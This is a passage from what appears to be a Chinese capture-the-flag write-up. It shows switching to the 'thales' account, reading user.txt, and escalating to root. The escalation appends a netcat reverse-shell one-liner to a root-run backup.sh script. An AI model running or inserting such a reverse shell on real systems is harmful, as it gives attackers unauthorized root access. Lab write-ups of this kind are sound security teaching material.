文章插图
文章插图
切换thales账户:su thales,读取下user.txt文件,成功获取到flag信息 。
文章插图
提权至root:
根据上面的我们发现的backup.sh文件具有root权限,那我们就插入一个反弹shell,然后执行backup.sh脚本,成功获取root权限读取到root.txt 。
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.96 6688 >/tmp/f" >> backup.sh 
文章插图
经验总结扩展阅读
- 2023年9月30日结婚怎么样 2023年9月30日喜结婚吗
- 2023年小暑之后几天入伏
- 九 Istio:istio安全之授权
- Java安全之Tomcat6 Filter内存马
- 配偶的称谓
- 咖啡过夜之后还能喝吗
- 云顶之弈S7.5怒玉豹女阵容怎么玩
- 芡实怎么煮烂
- 云原生之旅 - 4)基础设施即代码 使用 Terraform 创建 Kubernetes
- 云顶之弈龙境探秘活动玩法是什么